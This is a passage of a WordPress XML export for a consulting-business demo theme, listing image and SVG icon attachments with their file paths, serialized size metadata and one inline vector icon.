"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/bg1-service-grid/</link>
		<pubDate>Fri, 11 Sep 2020 09:54:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>878</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 09:54:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 09:54:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-grid]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-grid.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:600;s:4:"file";s:28:"2020/09/bg1-service-grid.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"bg1-service-grid-300x94.jpg";s:5:"width";i:300;s:6:"height";i:94;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"bg1-service-grid-1024x320.jpg";s:5:"width";i:1024;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"bg1-service-grid-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"bg1-service-grid-768x240.jpg";s:5:"width";i:768;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"bg1-service-grid-1536x480.jpg";s:5:"width";i:1536;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-grid-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-grid-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"bg1-service-grid-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"bg1-service-grid-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>deal</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/deal/</link>
		<pubDate>Fri, 11 Sep 2020 10:22:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/deal.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>887</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:22:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:22:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[deal]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>885</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/deal.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/deal.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/service-box1/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>902</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/service-box2/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>903</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box2-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box2-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box2-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/service-box3/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>904</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box3-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box3-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box3-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/service-box4/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>905</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box4-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box4-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box4-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/service-box5/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>906</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box5-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box5-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box5-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/service-box6/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>907</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
